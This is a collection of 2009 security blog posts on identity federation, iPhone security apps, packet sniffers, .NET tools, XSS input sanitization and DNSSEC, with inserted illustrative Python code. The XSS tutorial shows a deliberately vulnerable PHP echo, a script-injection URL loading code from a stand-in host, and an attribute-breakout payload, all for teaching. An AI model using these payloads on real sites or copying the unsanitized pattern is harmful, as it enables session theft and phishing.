Enabling Secure Business Operations

Microsoft Geneva overcoming Identity Management Hurdles

June 25th, 2009

Les Jordan from Microsoft recently wrote a blog post entitled Identity Management: a key to seamless CTMS and EDC. In it, he presents some of the solutions Microsoft is introducing in the identity management space, currently under the name Microsoft Geneva, including the Geneva Framework and the Microsoft Identity Federation Gateway.

The idea is fairly simple. Many (most?) large enterprises already manage their users and systems with Active Directory.  Geneva lets you publish the parts of your Active Directory needed for identity federation on the Internet.  It does so in a standards-compliant way (WS-Federation, WS-Trust and SAML 2.0), so that claims about your users can be issued to, and consumed by, applications in other enterprises.

…the issue of Identity Management, Username and Password proliferation, and cross-company collaboration is an issue that has hindered true (and secure) data availability and collaboration in the Life Sciences industry.  Perhaps now we can get the Identity Management issue behind us and move on.

Whether or not Geneva becomes the one standard way to do interoperable identity management across enterprises in the life sciences space, it is clearly going to lower barriers between organizations and increase the trust we can place in digital identities.


4 Good Security Applications For The iPhone

June 25th, 2009

With the release of iPhone OS 3.0, I thought it would be worth visiting some useful security-related iPhone applications. Here are 4 good security applications for the iPhone that will make you the coolest person at the next IT security conference.

  1. 1Password (Cost: $4.99) – This application encrypts the data it stores using AES, fills in website logins for you (something close to single sign-on), and adds its own unlock code on top of the device passcode, all protected by a single master password. The power of this application is in the encryption, and it has other goodies like password generation and secure notes built in, as well as a desktop version and syncing (for extra).
  2. RSA SecurID Software Token (Cost: Free) – SecurID is two-factor authentication, and with this application your iPhone is the "something you have" factor: it generates the rotating tokencode that would otherwise come from a hardware fob, which you combine with your PIN to form the passcode. This application is only useful if your organization is already running RSA Authentication Manager.
  3. Security for People and Computers eBook (Cost: Free) – Written by Neal Puff (CISSP), one of Computerworld’s Premier 100 IT Leaders with over 20 years of IT experience, this eBook focuses on general computer and networking security with some additional information on protecting your home. I haven’t read the eBook, but it’s free and worth a look.
  4. MobileMe (Find My iPhone arrived with iPhone OS 3.0) – Ok, admittedly this isn’t an iPhone app in the traditional sense, and it requires a MobileMe subscription, but the new Find My iPhone feature tells you where your iPhone is if it’s lost or stolen. While a dramatic recovery isn’t likely, MobileMe’s remote wipe can help keep your data away from thieves.

There are a couple of good security iPhone apps out there I’ve likely missed but there are also tons and tons of really bad iPhone security applications as well. Know of any to add to this list, good, bad, or even silly? As always, comments are welcome.

Each Thursday, Security Musings features a security-related technology or tool. Featured items do not imply a recommendation by Gemini Security Solutions. For more information about how Gemini Security Solutions can help you solve your security issues, contact us!


Microsoft Security Essentials in Beta

June 24th, 2009

Microsoft released its new Security Essentials in beta today. So far, the reports are that it’s nice. I don’t run Windows except within VMware, so I’m not going to be testing it out anytime soon, but I’d love to hear what you think about it.

However, Security Essentials will only install on “genuine” Windows systems, that is, those that pass Windows Genuine Advantage (WGA) validation. Microsoft fought this battle before with security patches. They had initially said that security patches would only be available for “genuine” systems. However, that would have left an awful lot of systems vulnerable to attackers just because they were not legit (I’d love to see a statistic on what percentage aren’t). This is the same type of thing: protection is only available to those who go through the effort of getting their system checked (I know I’ve been canceling that particular window for the last few months). As long as other anti-virus makers are willing to step up and keep anti-virus available for those who don’t bother with WGA, we won’t see any problems; otherwise I suspect we might see botnets form more easily.


The Demise of Clear

June 23rd, 2009

Overnight, the Clear Registered Traveler Program ceased operation.  I do travel by air 5-10 times per year, and had considered the program to speed my visits through airports.  There were three main reasons why I didn’t, and I wonder if they are reasons why they have had to cease operation.

  1. There weren’t Clear lanes at every airport I travel to; the only way this system could be cost effective for me would be if it worked everywhere.
  2. As mentioned at the Consumerist, the Clear lanes just provide shorter lines; you still were subject to all the security checkpoint hassles.
  3. My home airport, Dulles International, opened the Black Diamond lanes: basically the same as Clear without the fee.

In addition to the $199/year charge, enrolling in Clear required presenting two IDs and your Social Security number, and having your fingerprints and iris images captured. Clear lost (and found) a laptop last year, and although their privacy policy (pdf) states that all personal information is always stored and transmitted encrypted, it doesn’t say what algorithm is used or how key management is performed. (Remember, ROT13 is an encryption algorithm…)  Biometrics are the only identification factor that can’t be revoked and reissued, so giving mine up to both a private company and the Transportation Security Administration to save perhaps 15 minutes didn’t seem like a good idea.

The privacy policy also indicates that personal information is removed from their system automatically after 90 days if you are no longer a Clear member. It is not yet clear if the cessation of operation that occurred overnight will trigger this data removal event. It is also not clear if the TSA ever gives up your data which Clear shares.  All told, if I had been a Clear member, I would seriously examine tools for detecting and preventing identity theft for a while.


Colasoft Capsa vs. Wireshark

June 22nd, 2009

This builds off of Sniffing Networks Part 3- Understanding what you’re seeing.  This article introduces another tool to use for network sniffing and compares it to the previously mentioned Wireshark.

You’ve already been introduced to Wireshark and learned how to use it.  We now consider another tool, Colasoft Capsa Enterprise Edition, which can also be used for network sniffing.  Colasoft Capsa offers many of the same features as Wireshark and adds some analysis features of its own.  Like Wireshark, Colasoft Capsa captures and decodes packets and supplies a hex view of each packet.  Below is a screenshot of the packet view in Colasoft Capsa.  Both programs automatically color-code protocols.

[Screenshot: the packet view in Colasoft Capsa]

Colasoft Capsa allows you to apply filters to view select types of packets or view all but the selected packets.  Filters can be applied by address, port, or protocol as well.  It is also possible to enable advanced filters which are similar to Wireshark’s filters.  In advanced filters, you can combine specific addresses, ports, protocols, and packets by size, value, or pattern in any combination using “and,” “or,” and “not” logic modifiers.

It is possible to view related packets in Colasoft Capsa by right-clicking a packet and choosing an option from “Select Related Packets.”  This action will highlight packets related in the specified manner.  Choosing “By Flow” from the related packets menu results in highlighting the packets that Wireshark glues together when selecting “Follow TCP Stream.”  While this shows the related packets, Colasoft Capsa does not show all packets of a stream in one window as Wireshark does.  Other relations for grouping packets in Colasoft Capsa include by source, destination, or protocol.

Colasoft Capsa offers many of the analysis features that are found in Wireshark.  For example, both programs can display endpoints and protocols from the captured packets along with statistics on the amount of information sent and received for each.  The difference is that Colasoft Capsa adds a visual interpretation to the statistics.

Colasoft Capsa offers other visual aids such as graphs and a matrix view in which all endpoints that communicate are connected.  Additional features include reports, logs, and diagnostic capabilities that can be used to discover network problems.  All of Colasoft Capsa’s features are discussed in more detail in the article Using Colasoft Capsa.
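What a sniffer actually computes for the features compared above (the "By Flow" related-packet selection, the endpoint statistics, and the and/or/not filters) is easy to show in code. The following is an added example, not part of the original post and not code from either product: it runs over a handful of constructed packet summaries (the rows a capture tool would display, not real traffic) and implements each feature as a small Python function.

```python
# Added example, not from the original post: the bookkeeping behind "Select
# Related Packets > By Flow", the endpoints statistics, and and/or/not filters,
# run over a few constructed packet summaries (not real traffic).
from collections import defaultdict

# Constructed packet summaries, one per capture row: a short HTTP exchange,
# a DNS query/response, and a lone TLS SYN from a second host.
PACKETS = [
    {"src": "10.0.0.5", "sport": 51000, "dst": "192.0.2.10", "dport": 80, "proto": "TCP", "len": 74},
    {"src": "192.0.2.10", "sport": 80, "dst": "10.0.0.5", "dport": 51000, "proto": "TCP", "len": 74},
    {"src": "10.0.0.5", "sport": 51000, "dst": "192.0.2.10", "dport": 80, "proto": "TCP", "len": 400},
    {"src": "192.0.2.10", "sport": 80, "dst": "10.0.0.5", "dport": 51000, "proto": "TCP", "len": 1500},
    {"src": "10.0.0.5", "sport": 53000, "dst": "10.0.0.1", "dport": 53, "proto": "UDP", "len": 78},
    {"src": "10.0.0.1", "sport": 53, "dst": "10.0.0.5", "dport": 53000, "proto": "UDP", "len": 94},
    {"src": "10.0.0.7", "sport": 44000, "dst": "192.0.2.10", "dport": 443, "proto": "TCP", "len": 74},
]


def flow_key(pkt):
    """Bidirectional flow key: both directions of a conversation map to the same key."""
    ends = sorted([(pkt["src"], pkt["sport"]), (pkt["dst"], pkt["dport"])])
    return (pkt["proto"], ends[0], ends[1])


def related_by_flow(pkts, pkt):
    """The packets a 'By Flow' selection highlights (the 'Follow TCP Stream' set)."""
    return [p for p in pkts if flow_key(p) == flow_key(pkt)]


def flow_table(pkts):
    """{flow key: (packet count, bytes)}, the conversation-level view."""
    table = defaultdict(lambda: [0, 0])
    for p in pkts:
        entry = table[flow_key(p)]
        entry[0] += 1
        entry[1] += p["len"]
    return {k: tuple(v) for k, v in table.items()}


def endpoint_stats(pkts):
    """Bytes sent and received per IP endpoint, as an endpoints tab reports them."""
    stats = defaultdict(lambda: {"sent": 0, "received": 0})
    for p in pkts:
        stats[p["src"]]["sent"] += p["len"]
        stats[p["dst"]]["received"] += p["len"]
    return dict(stats)


# Filter predicates and the and/or/not combinators an "advanced filter" composes.
def ip_is(ip):
    return lambda p: ip in (p["src"], p["dst"])


def port_is(port):
    return lambda p: port in (p["sport"], p["dport"])


def proto_is(proto):
    return lambda p: p["proto"] == proto


def f_and(*preds):
    return lambda p: all(f(p) for f in preds)


def f_or(*preds):
    return lambda p: any(f(p) for f in preds)


def f_not(pred):
    return lambda p: not pred(p)


def apply_filter(pkts, pred, exclude=False):
    """exclude=True is the 'view all but the selected packets' mode."""
    return [p for p in pkts if pred(p) != exclude]
```

Note that the flow key sorts the two (address, port) ends, which is what makes the reply packets land in the same flow as the request; a tool that grouped on the raw source/destination pair would show each direction as a separate conversation.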


Using Colasoft Capsa

June 19th, 2009

This article builds off of the Sniffing Networks series and introduces Colasoft Capsa Enterprise Edition, which can be used for network sniffing and analysis.

To get started capturing packets with Colasoft Capsa, click on the “Start Capture Now” button on the opening screen. Clicking this will open the project settings, which can be customized depending on the project. The project settings can also be modified later by the toolbar at the top of the window. Click OK to get started. This starts the capture which can be stopped at any time by clicking the stop button along the top toolbar.

After capturing packets there will be two additional docked windows to the left, and the main window now contains ten tabs. The top left window labeled Explorer can be used as a filter of sorts to change the data seen and analyzed in the tabs to the right. The Project Status window gives a general overview of the project and packets captured. The summary tab provides a more in-depth look at the packets collected.

The diagnosis tab can be helpful for monitoring and solving problems on the network. Each diagnosis event falls under one of four network layers: application, transport, network, or data link; each event is also given a severity level depending on the type of event. All diagnosis events are predefined by the software. Clicking on a diagnosis event brings up a references tab within the window, which gives a description of the event and possible causes and solutions. The endpoints tab gives statistics for each of the physical endpoints of the network, which illustrates the flow of traffic.

[Screenshot: the Colasoft Capsa protocols tab]

The protocols tab separates the information by protocol. As seen above, the bytes used for each are displayed as a bar. The protocols are listed as a hierarchy, so there is overlap within the total bytes. The conversation tab is divided into two windows. The top window shows all the connections made between different endpoints. The type of endpoint can be changed to represent physical, IP, TCP, or UDP endpoints. All packets that belong to the selected conversation are displayed in the bottom window.

The matrix view, as seen below, visually shows all the endpoints and the connections they make with each other. Essentially, every conversation is shown as a line. The endpoints displayed can be sorted by physical or IP, as well as any combination of unicast, multicast, and broadcast traffic types.

[Screenshot: the Colasoft Capsa matrix view]

The packets tab displays the packets as they are captured and provides information on source, destination, size, and protocol. The packets tab also has a window that decodes the selected packet. To help sort through the packets, you can right click on a packet and choose “Select Related Packets” to show packets related by source, destination, flow, or protocol.

The logs view keeps track of events such as HTTP requests, email messages, DNS queries, and instant messenger activities. All logs are enabled in the default project settings, but any or all can be excluded. The logs can also be set to be automatically saved to a file.

[Screenshot]

The graphs can be useful for presenting data because they give a visual interpretation of the numbers. There are many groupings of information for the graphs and many types of graphs, including line graphs, area graphs, bar graphs, pie charts, and 3-D options. It is also possible to compare two graphs. The last tab, reports, is similar to the summary tab but presents data by integrating numbers and graphics. This tab contains packet and protocol statistics, diagnosis events, and charts such as top ten IP protocols and top ten physical addresses.

As mentioned earlier, the explorer window is one way to limit the information analyzed, but it is also possible to apply filters. Filters can be formed by packet, address, port, and protocol type, as well as more advanced filtering options.

In addition, Colasoft Capsa comes with four extra tools. These consist of a MAC Scanner, Packet Builder, Packet Player, and Ping tool. For more information on Colasoft Capsa and these tools, visit the Colasoft website at http://www.colasoft.com/.


Two Handy .NET Framework Tools

June 18th, 2009

This post isn’t going to deal with security directly, but rather with two command line tools that come with the .NET framework. The tools, WSDL.exe and XSD.exe, are used to easily create .NET wrapper classes to deal with web services and XML files, respectively. Both of these command line tools are installed alongside the .NET framework (on my machine, they’re located in C:\Program Files\Microsoft SDKs\Windows\v6.0A\bin, although if you start the Visual Studio command prompt, they should be accessible via PATH entries anyway).

The WSDL tool can quickly create a .NET class that can invoke remote web services given a WSDL service definition. A quick example of how to use the tool would be to open a command prompt and type:

wsdl /namespace:MyProgram.Services /username:user /password:password /out:MyWebService.cs http://webserver/services/MyWebService?wsdl

This will generate a C# class named MyWebService in the MyProgram.Services namespace, written to MyWebService.cs in the current folder, with the proxy methods and types needed to call the web service that WSDL describes. All you have to do is configure a credential (if needed), and you can call the web service through the object. One caveat: the /username: and /password: switches only authenticate the download of the WSDL document, and a password typed on the command line ends up in your console history and is visible to anyone who can list your processes, so when the endpoint requires credentials it is better to save the WSDL locally by other means and point the tool at the file.

The XSD tool can be used to create an XSD file and a .NET class based on any XML file, including one you made up yourself with no related schema definition. The XML file could be as simple as:

<MyFolders>
   <Folder>c:\folder1</Folder>
   <Folder>c:\folder2</Folder>
</MyFolders>

Using the XSD tool, you can generate an XSD file to accompany this XML by opening a command prompt and running:
xsd MyFolders.xml

This will create the MyFolders.xsd schema definition file. Once we have that, we can generate a .NET wrapper class using the same tool:
xsd /namespace:MyProgram.Xml /classes /language:CS MyFolders.xsd

This will create the MyProgram.Xml.MyFolders class in the file MyFolders.cs, which you can then use with the System.Xml.Serialization.XmlSerializer class to easily create objects from XML files and vice versa.



Sanitizing Input in Web Apps (Part 1)

June 16th, 2009

Most XSS and SQL injection vulnerabilities are due to improper sanitization of input data.

Cleaning such data is vitally important to maintaining the security of a website or web application.

This series of blog posts will examine several input sanitization examples within a PHP environment (raw data, data within attribute fields, database sanitization, etc.).

It also assumes you know a bit about writing PHP code in the first place, since we will be using some PHP functions. However, the general ideas we cover apply to all dynamic web apps, regardless of the platform on which they are built.

Note: There are ways to clean MOST input data simply by using special libraries or a series of functions. However, by covering basic cases (including how each one poses a threat and how each one may be corrected individually) we can give a much broader view of the fundamental problems associated with improper data sanitization and the dangers of injection.

Case 1: Basic Raw Data Input/Output

This case is for the (probably rare) situations in which your code displays exactly what the user typed into the body of the HTML output (not necessarily within a tag itself).

Example Script: example1.php

---------------------------
<?php

$test_input = $_REQUEST['test_input'];
echo " You entered: $test_input "; // deliberately unsanitized: the raw input is reflected into the page
?>
---------------------------

Assuming $test_input is the variable we want to clean up, we simply need to make sure that the data doesn’t have any HTML tags in it. After all, without tags, it is just text data. If this data were displayed without sanitization, a malicious user could easily inject some <script type="text/javascript"> tags and do… bad things. Very bad. Horrifying even.

It’d look something like this:

http://example.com/example1.php?test_input=<script src="http://badsite.com/verybad/omg_this_is_horrifying.js"></script>

This would inject a script element in which the contents of the script at badsite.com are executed within the context of the user visiting the website. This can result in everything from stolen credentials, to session hijacks, to phishing attempts.

So, to clean those pesky HTML tags, we can simply convert the left and right angle brackets to something a little more pleasant. Blank spaces, non-breaking spaces, pictures of kittens, etc. Personally, I prefer the HTML character entities &lt; and &gt; since they render the same as the HTML tag delimiters but are completely harmless. (Pro tip: lt and gt stand for ‘less than’ and ‘greater than’ respectively.)

There are many ways to do the switcheroo… but here is one example:

Example Script: example1_fixed.php

---------------------------
<?php

$test_input = $_REQUEST['test_input'];
$test_input = str_replace('<', "&lt;", $test_input); // first the left angle bracket
$test_input = str_replace('>', "&gt;", $test_input); // then the right angle bracket
// (PHP's built-in htmlspecialchars() does this and also escapes &, " and ')
echo "<html><body> You entered: $test_input </body></html>";
?>
---------------------------

Now your code will sanitize that input and protect against XSS attacks of this nature. Note what it does not do: it leaves ampersands and quote characters alone, which is fine inside body text but is exactly why things get hairy when that data is used as an attribute value within a tag or in other sensitive parts of the HTML source.

But that will be covered in Part 2: Data Used as an Attribute Within a Tag or in Other Sensitive Parts of the HTML Source.
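The post's point is platform-independent, so here is the same comparison in Python, where the standard library can both escape HTML and parse it back. This is an added example, not code from the original post: it renders the page's own script payload, and a second constructed payload that contains no angle brackets at all, through no escaping, the angle-bracket-only escaping of example1_fixed.php, and the full escaping that htmlspecialchars() would do, then parses each result the way a browser would and checks whether the user's text stayed text.

```python
# Added example, not from the original post: the PHP fix re-done in Python,
# beside the full escape, and checked by parsing the rendered HTML back and
# asking whether the user's text stayed text. ATTR_PAYLOAD is constructed.
import html
from html.parser import HTMLParser

# The page's own script payload, plus one with no angle brackets at all.
SCRIPT_PAYLOAD = '<script src="http://badsite.com/verybad/omg_this_is_horrifying.js"></script>'
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'  # constructed attribute-breakout payload


def escape_angle_brackets_only(s):
    """What example1_fixed.php does: only < and > become entities."""
    return s.replace("<", "&lt;").replace(">", "&gt;")


def escape_for_html(s):
    """& < > " ' all become entities (PHP: htmlspecialchars($s, ENT_QUOTES))."""
    return html.escape(s, quote=True)


def render_text(user_input, escaper):
    """example1.php's output: the input lands in the body as text."""
    return f"<html><body> You entered: {escaper(user_input)} </body></html>"


def render_attribute(user_input, escaper):
    """Same input echoed inside a double-quoted attribute (Part 2's territory)."""
    return f'<input type="text" value="{escaper(user_input)}">'


class _Audit(HTMLParser):
    """Records the tags and attributes a browser-like parser actually sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.text = [], ""

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, attrs))

    def handle_data(self, data):
        self.text += data


def _parse(rendered):
    audit = _Audit()
    audit.feed(rendered)
    audit.close()
    return audit


def text_context_safe(rendered, user_input):
    """Safe iff the only elements are html/body and the input survived as text."""
    audit = _parse(rendered)
    return [t for t, _ in audit.tags] == ["html", "body"] and user_input in audit.text


def attribute_context_safe(rendered, user_input):
    """Safe iff there is exactly one input element and value holds the whole input."""
    audit = _parse(rendered)
    return audit.tags == [("input", [("type", "text"), ("value", user_input)])]


def audit():
    """{escaper name: (safe in text context?, safe in attribute context?)}"""
    escapers = {
        "none": lambda s: s,
        "angle_only": escape_angle_brackets_only,
        "full": escape_for_html,
    }
    return {
        name: (
            text_context_safe(render_text(SCRIPT_PAYLOAD, esc), SCRIPT_PAYLOAD),
            attribute_context_safe(render_attribute(ATTR_PAYLOAD, esc), ATTR_PAYLOAD),
        )
        for name, esc in escapers.items()
    }
```

The angle-bracket-only fix passes in the body-text case and fails in the attribute case, because the attribute payload never needs a `<`: a stray double quote is enough to close `value` and start an `onfocus` handler. Escaping all five characters (`& < > " '`) is the version that holds up in both contexts.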

Each Tuesday, Security Musings features a topic to help educate our readers about security. For more information about Gemini Security Solutions’ security education capabilities, contact us!


DNSSEC

June 9th, 2009

It’s been in the news lately. Both the Root Domain and the .ORG domain are implementing DNSSEC. So what does that mean? It means that a lot of attacks that require spoofing DNS will no longer work as easily.

There is lots of information over at dnssec.net, including links to all of the relevant RFCs, but I’m going to give the simple layman’s description of DNSSEC. DNSSEC uses Public Key cryptography, so a basic understanding of it will be very useful.

The root (.) zone delegates all of the top-level domains (TLDs), things like .net, .com, and .org (among many others). Each TLD operator in turn delegates second-level domains, like securitymusings.com. When a domain implements DNSSEC, the records it serves carry digital signatures.

Here is the lookup without the signatures. If I want to know the IP address of securitymusings.com, my computer asks my ISP’s DNS server. If it doesn’t already have the answer cached, it asks a root server, which doesn’t know the address but does respond with the name servers for .com. It then asks a .com server, which doesn’t know the address either but does know the name servers for securitymusings.com, and sends it there. Finally it asks one of those, and the authoritative server for securitymusings.com responds with the address. There’s a lot of caching going on in there, but we can ignore it for now.

With DNSSEC, each zone has its own key pair. Records from that zone are signed with its private key, and the public key is published in the zone itself (as a DNSKEY record). Each link in the chain is vouched for by the one above it: the parent publishes a hash of the child’s public key (a DS record) and signs that with its own key. So the signature on securitymusings.com’s answer is checked against securitymusings.com’s key, that key is checked against the DS record in .com, and .com’s key is checked against the DS record in the root. The root’s key is the one thing the validator has to trust up front. Whoever does the validating (normally the ISP’s resolver; most end-user machines don’t check signatures themselves) has to verify every signature in that chain. It adds a bit of overhead, but the spec still allows for caching, and that helps speed the process up a bit.

So, if you own a .org domain, what can you do about it? If you’re running your own DNS servers, you can sign your zone and have .org publish the DS record for your key, which is what links your domain into the .org chain. You’ll have to check with your registrar to see how (and when) to go about doing that; as far as I know, none are offering it yet. Those with .com domains? You’re out of luck for a while, unless you’re going to use it internally only.
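The chain of trust just described, as an added example that is not part of the original post: a root zone, a com zone and a securitymusings.com zone each sign their own records, each parent publishes a signed DS record for its child’s key, and a validating resolver that trusts only the root’s public key walks the chain down to an A record. The zone names come from the post; the addresses, the way records are modelled as Python dicts, and the signature scheme (textbook RSA with tiny keys and no padding, standing in for the real DNSSEC algorithms, and not secure) are assumptions made for the demo. It also shows the two ways a spoofed answer fails: a rewritten record whose old signature no longer matches, and a whole fake zone whose key does not match the DS record in .com.

```python
# Added example, not from the original post: a toy model of the DNSSEC chain of
# trust for the lookup described above. Zone names, addresses and keys are
# constructed; textbook RSA with tiny keys and no padding stands in for the real
# DNSSEC algorithms and is NOT secure. Needs Python 3.8+ for pow(e, -1, m).
import hashlib
import random

random.seed(2009)  # reproducible toy keys

def _is_probable_prime(n, rounds=16):
    """Miller-Rabin, enough for toy key generation."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits):
    while True:
        c = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(c):
            return c

def keygen(bits=128):
    """(public, private) = ((n, e), (n, d)); tiny keys, illustration only."""
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so this is gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))

def rr_bytes(owner, rtype, data):
    """Canonical form of a (simplified) resource record; this is what gets signed."""
    return f"{owner}|{rtype}|{data}".encode()

def _h(data, n):
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n

def sign(priv, data):
    return pow(_h(data, priv[0]), priv[1], priv[0])

def verify(pub, data, sig):
    return pow(sig, pub[1], pub[0]) == _h(data, pub[0])

def key_digest(owner, pub):
    """What a DS record carries: a hash of the child's DNSKEY, published by the parent."""
    return hashlib.sha256(rr_bytes(owner, "DNSKEY", pub)).hexdigest()

class Zone:
    def __init__(self, name):
        self.name, (self.pub, self.priv) = name, keygen()
        self.records = {}             # (owner, rtype) -> (data, RRSIG)
        self.add("DNSKEY", self.pub)  # the zone's own key, signed by itself

    def add(self, rtype, data, owner=None):
        owner = owner or self.name
        self.records[(owner, rtype)] = (data, sign(self.priv, rr_bytes(owner, rtype, data)))

    def delegate(self, child):
        """The parent vouches for the child's key by publishing and signing a DS record."""
        self.add("DS", key_digest(child.name, child.pub), owner=child.name)

def zone_chain(zones, qname):
    """Zones from the root down to the one holding qname, e.g. ['.', 'com', 'securitymusings.com']."""
    labels = qname.split(".")
    return ["."] + [z for z in (".".join(labels[i:]) for i in range(len(labels) - 1, -1, -1)) if z in zones]

def validate(zones, trust_anchor, qname, qtype):
    """Validating resolver: the record data if every link verifies, else None.
    The only thing trusted a priori is the root's public key."""
    parent, parent_key = None, None
    for z in zone_chain(zones, qname):
        key, sig = zones[z].records[(z, "DNSKEY")]
        if not verify(key, rr_bytes(z, "DNSKEY", key), sig):  # DNSKEY self-signature
            return None
        if parent is None:  # root: must equal the trust anchor
            if key != trust_anchor:
                return None
        else:  # child: must match the DS record the parent signed
            ds, ds_sig = zones[parent].records[(z, "DS")]
            if not verify(parent_key, rr_bytes(z, "DS", ds), ds_sig) or key_digest(z, key) != ds:
                return None
        parent, parent_key = z, key
    data, sig = zones[parent].records[(qname, qtype)]
    return data if verify(parent_key, rr_bytes(qname, qtype, data), sig) else None

def build_example():
    """Root -> com -> securitymusings.com, each signing the next; returns (zones, trust anchor)."""
    root, com, sm = Zone("."), Zone("com"), Zone("securitymusings.com")
    root.delegate(com)
    com.delegate(sm)
    sm.add("A", "192.0.2.10")  # constructed address
    sm.add("A", "192.0.2.10", owner="www.securitymusings.com")
    return {z.name: z for z in (root, com, sm)}, root.pub

def spoof_record(zones, qname, fake_ip):
    """Spoofer rewrites the answer but has no private key, so the old RRSIG no longer matches."""
    _, old_sig = zones["securitymusings.com"].records[(qname, "A")]
    zones["securitymusings.com"].records[(qname, "A")] = (fake_ip, old_sig)

def spoof_zone(zones, fake_ip):
    """Spoofer serves a whole fake zone signed with their own key; .com's DS does not match it."""
    fake = Zone("securitymusings.com")
    fake.add("A", fake_ip)
    zones["securitymusings.com"] = fake
```

The point to take from `validate` is that nothing below the root is trusted on its own say-so: a zone’s self-signed DNSKEY only counts once the parent’s signed DS record vouches for it, and the parent’s key only counts once its parent does, all the way up to the anchor. Real DNSSEC adds details this toy skips (key-signing versus zone-signing keys, signature validity windows, NSEC records for proving that a name does not exist), but the shape of the check is the same.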



iPhone 3G S – Hardware Encryption?

June 8th, 2009

As many have noticed, Apple has released their new lineup of laptops, software, OSes, and iPhones. As I watched live coverage of the keynotes on Monday (thanks Gizmodo) – a few things caught my attention when they were speaking about the new iPhone 3G S.

The first thing that caught my eye was the mention of “hardware encryption.” Now, simply mentioning that a device supports hardware encryption can mean a lot of things, and Apple isn’t very clear about what they mean by this. Trying to do some further research didn’t help much either, as I only ended up being further confused by all the different mentions of this “hardware encryption.” The official word from Apple is…

iPhone 3G S offers highly secure hardware encryption that enables instantaneous remote wipe. You can even encrypt your iTunes backups.

…according to that, it would sound like the remote wipe is dependent on the hardware encryption, which makes me believe that instead of actually wiping the data (as in a format), it would simply delete the private key – therefore making the data inaccessible. (Since iTunes stores a backup of all your iPhone data at every sync, securing this also seems important.)  This also assumes it’s using a strong form of encryption. I’ve also read in other posts…

…hardware encryption for Exchange users…

…as the listed feature. Does this mean it’s only available through Exchange, and at what level is it being used? Is it only securing your email? We know the iTunes songs and videos are already being encrypted on the device. Is this the same form of encryption they’re talking about?  We’ve asked an insider at Apple to help us out with some of these questions and are still awaiting a response.

All of this brings up major questions about the REAL security behind all these marketing terms. How much do companies actually care about security, and how much do they actually do to help protect their users? Is everything just a marketing ploy these days?

Users were upset about the lack of security in our last model of product X. Let’s add minor revisions and throw some good marketing verbiage in the features list and hope that fixes everything.

Is this how security is being treated? Apple isn’t the only company being vague about these types of issues; it rolls all across the board. They just happen to be the ones asking for the most attention at this current point in time.  Stay tuned as I hope to find and relay some answers to many of these questions as more details are revealed.
